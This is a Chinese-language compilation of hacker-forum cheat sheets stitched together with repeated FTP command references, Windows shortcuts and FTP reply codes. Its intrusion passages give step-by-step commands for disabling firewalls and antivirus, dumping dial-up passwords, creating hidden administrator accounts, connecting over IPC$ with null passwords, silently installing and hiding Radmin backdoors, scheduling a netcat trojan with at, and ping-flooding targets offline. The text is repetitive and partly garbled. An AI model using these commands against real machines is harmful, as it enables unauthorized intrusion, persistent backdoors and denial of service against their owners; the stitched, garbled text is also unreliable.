FTP入侵命令

FTP命令详解FTP命令详解--------------------------------------------------------------------------------FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用FTP，都会遇到大量的FTP内部命令。

熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。

FTP的命令行格式为： ftp -v -d -i -n -g [主机名] ，其中 -v 显示远程服务器的所有响应信息； -n 限制ftp的自动登录，即不使用； .n etrc文件； -d 使用调试方式； -g 取消全局文件名。

ftp使用的内部命令如下(中括号表示可选项):1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如： !ls*.zip.2.$ macro-ame[args]：执行宏定义macro-name.3.account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。

6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。

8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。

12.chmod mode file-name：将远程主机文件file-name的存取方式设置为 mode，如： chmod 777 a.out 。

13.close：中断与远程服务器的ftp会话(与open对应)。

14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

黑客常用入侵命令控制面版：运行>>>>>>>>>>>:control计算机管理：command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务：net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如：)结束进程：NET SHARE查看版本：ver查看中端(服务）：net start查看文件：dir查看3389：加用户：c:\winnt\system32>net user adminserver$ admin /add提权限：net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令：telnet 主机IP踢人：logoff ID查看当前人：query user打开telnet:net start telnettelnet连接工具：OpenTelnet删除共享：net share c$=c:\删除共享：net share c$ /del启用GUEST：net user guest /active:yes为GUEST设密码：net user guest 888888提升到管理员：net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号：ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向：f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下：c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。

FTP命令详解--------------------------------------------------------------------------------FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用FTP，都会遇到大量的FTP内部命令。

熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。

FTP的命令行格式为： ftp -v -d -i -n -g [主机名] ，其中 -v 显示远程服务器的所有响应信息； -n 限制ftp的自动登录，即不使用； .n etrc文件； -d 使用调试方式； -g 取消全局文件名。

ftp使用的内部命令如下(中括号表示可选项):1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如： !ls*.zip.2.$ macro-ame[args]：执行宏定义macro-name.3.account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。

6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。

8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。

12.chmod mode file-name：将远程主机文件file-name的存取方式设置为 mode，如： chmod 777 a.out 。

13.close：中断与远程服务器的ftp会话(与open对应)。

14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

一些常用的入侵命令1.：net只要你拥有某ip的用户名和密码，那就用ipc$做连接吧！这里我们假如你得到的用户是hbx，密码是123456。

假设对方ip为127.0.0.1 net use \\127.0.0.1\ipc$ 123456 /user:hbx 退出的命令是net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面.2.下面我们讲怎么创建一个用户，由于sa的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功，那么我们可以把他加入administrator组了. net localgroup administrators heibai /add3.这里是讲映射对方的c盘，当然其他盘也可以，只要存在就行了.我们这里把对方的c盘映射到本地的z盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的telnet服务. ---------------------- 这里是将guest用户激活，guest是nt的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes4.这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。

只要有权限就行了呀！net user guest lovechina net命令果然强大啊！2:at 一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？那么需要用at命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，net time \\127.0.0.1 将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其id=1 at \\127.0.0.1 12:3 nc.exe 这里假设了一个木马，名为nc.exe，这个东西要在对方服务器上. 这里介绍一下nc，nc是netcat的简称，为了方便输入，一般会被改名.它是一个telnet服务，端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 3:telnet 这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡. 4:ftp 它可以将你的东西传到对方机子上，你可以去申请个支持ftp上传的空间，国内多的是，如果真的找不到，我/，不错的.当我们申请完后，它会给用户名，密码，以及ftp服务器. 在上传前需要登陆先，这里我们假设ftp服务/，用户名是hucjs，密码是654321 ftp / 他会要求输入用户，成功后会要求输入密码. ---------------------- 下面先说上传，假设你需上传的文件是index.htm，它位于c:\下，传到对方d:\ get c:\index.htm d:\ 假设你要把对方c盘下的index.htm，下到你的机子的d盘下put c:\index.htm d:\ 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好ipc$连接才有效。

FTP命令大全FTP命令是Internet用戶使用最頻繁的命令之一,不論是在DOS還是UNIX作業系統下使用FTP,都會遇到大量的FTP 內部命令,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,對於現在撥號上網的用戶，如果ISP提供了shell可以使用nohup，那麽ftp將是你最省錢的上download方式，ftp 的命令行格式爲:ftp －v －d －i －n －g[主機名]－v 顯示遠端伺服器的所有回應資訊。

－d 使用調試方式。

－n 限制ftp的自動登錄,即不使用.netrc文件。

－g 取消全局檔案名。

ftp使用的內部命令如下(其中括弧表示可選項):1.![cmd[args]在本地機中執行交互shell、exit回到ftp環境,如!ls＊.zip 。

2.￥macro－ame[args]執行巨集定義macro－name。

3.account[password]提供登錄遠端系統成功後訪問系統資源所需的補充口令。

4.appendlocal－file[remote－file]將本地文件追加到遠端系統主機,若未指定遠端系統檔案名,則使用本地檔案名。

5.ascii 使用ascii類型傳輸方式。

6.bell每個命令執行完畢後電腦響鈴一次。

7.bin使用二進位文件傳輸方式。

8.bye退出ftp會話過程。

9.case在使用mget時,將遠端主機檔案名中的大寫轉爲小寫字母。

10.cd remote－dir 進入遠端主機目錄。

11.cdup進入遠端主機目錄的父目錄。

12.chmod modefile－name將遠端主機文件file－name的存取方式設置爲mode,如chmod 777 a.out。

13.close中斷與遠端伺服器的ftp會話(與open對應)。

14.cr使用asscii方式傳輸文件時,將回車換行轉換爲回行。

15.刪除remote－file刪除遠端主機文件。

16.debug[debug－value]設置調試方式,顯示發送至遠端主機的每條命令,如debup3,若設爲0,表示取消debug。

ftp有很多命令，熟悉这些命令你能大大的提高工作效率：FTP命令行格式为：ftp -v -d -i -n -g [主机名] ，下面是ftp命令的参数的解释其中-v 显示远程服务器的所有响应信息；-n 限制ftp的自动登录，即不使用；、n etrc文件；-d 使用调试方式；-g 取消全局文件名。

下面就是FTP使用的内部命令（ftp命令大全）如下(中括号表示可选项):1、![cmd[args>：在本地机中执行交互shell，exit回到ftp环境，如：!ls*、zip2、$ macro-ame[args]：执行宏定义macro-name。

3、account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。

4、append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5、ascii：使用ascii类型传输方式。

6、bell：每个命令执行完毕后计算机响铃一次。

7、bin：使用二进制文件传输方式。

8、bye：退出ftp会话过程。

9、case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10、cd remote-dir：进入远程主机目录。

11、cdup：进入远程主机目录的父目录。

12、chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a、out。

13、close：中断与远程服务器的ftp会话(与open对应)。

14、cr：使用asscii方式传输文件时，将回车换行转换为回行。

15、delete remote-file：删除远程主机文件。

16、debug[debug-value]：设置调试方式，显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

17、dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件18、disconnection：同close。

FTP命令详解FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用FTP，都会遇到大量的FTP内部命令。

熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。

FTP的命令行格式为：ftp -v -d -i -n -g [主机名]，其中 -v显示远程服务器的所有响应信息； -n限制ftp的自动登录，即不使用； .n etrc文件； -d使用调试方式； -g取消全局文件名。

ftp使用的内部命令如下(中括号表示可选项): 1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip. 2.$ macro-ame[args]：执行宏定义macro-name. 3.account[password]：提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。

6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。

8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。

12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。

13.close：中断与远程服务器的ftp会话(与open对应)。

14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

15.delete remote-file：删除远程主机文件。

16.debug[debug-value]：设置调试方式，显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

当各位搞到一个shell，或者能远程执行命令之后，如何提权并保持肉鸡长期上线是一个难题。

本人仅根据个人经验，旁敲侧击的谈几个常用命令，算是抛砖引玉，欢迎大家前来指导交流!首先，提一下搞肉鸡，方法很多，1433、135、21，80、3389、4389，5900等端口都是常用的(有兴趣的可以下载专门的扫描器或者s扫描器)。

另外，说一下肉鸡的系统环境，一般都是服务器，所以杀毒软件、防火墙啥的相对来说还是比较牢固的，所以如何干扰并跳过这些保护也就是提权的关键。

最后，如何保持这个肉鸡长久上线，是目的所在，显然需要设置后门或者种植木马。

注：下文对喜欢3389直接远程登陆的用户不适用(不过善意提醒你，你留下了登陆等很多日志，呵呵);常见命令，如ipconfig、netstat等这儿不涉及，大家都会。

下面转入正文。

1.ver作用：查看系统版本实例：ver说明：提权第一步就是查看这个是个人机器还是服务。

2.tasklist作用：列出机器的所有进程实例：tasklist说明：用它你就可以知道肉鸡的杀毒软件、防火墙是啥。

后面就好办了，给他中马的时候，首先本地测试，免杀，再种上去，防止中马不成功，或者留下查杀记录。

(笨的办法可以直接停止杀毒软件，见后面命令。

不过这样管理员就肯定知道自己中木马了，你长久控制肉鸡的目标也就要破碎了)。

3.taskkill作用：杀制定名字或者pid的进程实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389说明：使用它可以结束防火墙进程啥的。

因为它阻止你打开网络端口，或者以这台肉鸡为代理进行其他扫描、入侵啥的。

当然，也可以结束杀毒软件等。

start作用：列出机器所有服务或者启动某个指定的服务实例: net start 或者 net start w3svc(启动iis)说明:通过它列出的所有服务可以看到服务器安装的杀毒软件，以及开放哪些服务。

黑客入侵中常用的命令*net user 查看用户列表*net user 用户名密码/add 添加用户*net user 用户名密码更改用户密码*net localgroup administrators 用户名/add 添加用户到管理组*net user 用户名/delete 删除用户*net user 用户名查看用户的基本情况*net user 用户名/active:no 禁用该用户*net user 用户名/active:yes 启用该用户*net share 查看计算机IPC$共享资源*net share 共享名查看该共享的情况*net share 共享名=路径设置共享。

例如net share c$=c:*net share 共享名/delete 删除IPC$共享*net use 查看IPC$连接情况*net use //ip/ipc$ "密码" /user:"用户名" ipc$连接*net time //ip 查看远程计算机上的时间*copy 路径:/文件名//ip/共享名复制文件到已经ipc$连接的计算机上*net view ip 查看计算机上的共享资源*ftp 服务器地址进入FTP服务器*at 查看自己计算机上的计划作业*at //ip 查看远程计算机上的计划作业*at //ip 时间命令(注意加盘符) 在远程计算机上加一个作业*at //ip 计划作业ID /delete 删除远程计算机上的一个计划作业*at //ip all /delete 删除远程计算机上的全部计划作业珍藏的最全的windows操作系统快捷键一、常见用法：F1显示当前程序或者windows的帮助内容。

F2当你选中一个文件的话，这意味着“重命名”F3当你在桌面上的时候是打开“查找：所有文件” 对话框F10或ALT激活当前程序的菜单栏windows键或CTRL+ESC打开开始菜单CTRL+ALT+DELETE在win9x中打开关闭程序对话框DELETE删除被选择的选择项目，如果是文件，将被放入回收站SHIFT+DELETE删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站CTRL+N新建一个新的文件CTRL+O打开“打开文件”对话框CTRL+P打开“打印”对话框CTRL+S保存当前操作的文件CTRL+X剪切被选择的项目到剪贴板CTRL+INSERT 或CTRL+C复制被选择的项目到剪贴板SHIFT+INSERT 或CTRL+V粘贴剪贴板中哪谌莸降鼻拔恢?ALT+BACKSPACE 或CTRL+Z 撤销上一步的操作ALT+SHIFT+BACKSPACE重做上一步被撤销的操作Windows键+M最小化所有被打开的窗口。

黑客入门必须掌握的几个入侵命令ping黑客技术入门它是用来检查网络是否通畅或者网络连接速度的命令。

作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。

下面就来看看它的一些常用的操作。

先看看帮助吧，在DOS窗口中键入：ping /？回车，。

所示的帮助画面。

在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。

试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。

结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n 定义向目标IP发送数据包的次数，默认为3次。

如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

说明一下，如果-t 参数和-n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。

另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP.下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小.从TTL的返回值可以初步判断被ping主机的操作系统，之所以说“初步判断”是因为这个值是可以修改的。

这里TTL=32表示操作系统可能是win98.（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就靠大家自己发挥了。

FTP命令‎是Inte‎r net用‎户使用最频‎繁的命令之‎一，不论是在D‎O S还是U‎N IX操作‎系统下使用‎F TP，都会遇到大‎量的FTP‎内部命令。

熟悉并灵活‎应用FTP‎的内部命令‎，可以大大方‎便使用者，并收到事半‎功倍之效。

FTP的命‎令行格式为‎：ftp -v -d -i -n -g [主机名]，其中-v显示远程‎服务器的所‎有响应信息‎；-n限制ft‎p的自动登‎录，即不使用；.n etrc文‎件；-d使用调试‎方式；-g取消全局‎文件名。

ftp使用‎的内部命令‎如下(中括号表示‎可选项):1.![cmd[args]]：在本地机中‎执行交互s‎h ell，exit回‎到ftp环‎境，如：!ls*.zip.2.$ macro‎-ame[args]：执行宏定义‎m acro‎-name.3.accou‎n t[passw‎o rd]：提供登录远‎程系统成功‎后访问系统‎资源所需的‎补充口令。

4.appen‎d local‎-file[remot‎e-file]：将本地文件‎追加到远程‎系统主机，若未指定远‎程系统文件‎名，则使用本地‎文件名。

5.ascii‎：使用asc‎i i类型传‎输方式。

6.bell：每个命令执‎行完毕后计‎算机响铃一‎次。

7.bin：使用二进制‎文件传输方‎式。

8.bye：退出ftp‎会话过程。

9.case：在使用mg‎e t时，将远程主机‎文件名中的‎大写转为小‎写字母。

10.cd remot‎e-dir：进入远程主‎机目录。

11.cdup：进入远程主‎机目录的父‎目录。

12.chmod‎mode file-name：将远程主机‎文件fil‎e-name的‎存取方式设‎置为mod‎e，如：chmod‎777 a.out。

13.close‎：中断与远程‎服务器的f‎t p会话(与open‎对应)。

14.cr：使用ass‎c ii方式‎传输文件时‎，将回车换行‎转换为回行‎。

黑客入侵基础知识FTP命令登陆提示翻译110 重新启动标记应答。

120 服务在多久时间内Ready。

125 数据链路埠开启，准备传送。

150 文件状态正常，开启数据连接端口。

200 命令执行成功。

202 命令执行失败。

211 系统状态或是系统求助响应。

212 目录的状态。

213 文件的状态。

214 求助的讯息。

215 名称系统类型。

220 新的联机服务ready。

221 服务的控制连接埠关闭，可以注销。

225 数据连结开启，但无传输动作。

226 关闭数据连接端口，请求的文件操作成功。

227 进入passive mode。

230 使用者登入。

250 请求的文件操作完成。

257 显示目前的路径名称。

331 用户名称正确，需要密码。

332 登入时需要账号信息。

350 请求的操作需要进一部的命令。

421 无法提供服务，关闭控制连结。

425 无法开启数据链路。

426 关闭联机，终止传输。

450 请求的操作未执行。

451 命令终止：有本地的错误。

452 未执行命令：磁盘空间不足。

500 格式错误，无法识别命令。

501 参数语法错误。

502 命令执行失败。

503 命令顺序错误。

504 命令所接的参数不正确。

530 未登入。

532 储存文件需要账户登入。

550 未执行请求的操作。

551 请求的命令终止，类型未知。

552 请求的文件终止，储存位溢出。

553 未执行请求的的命令，名称不正确。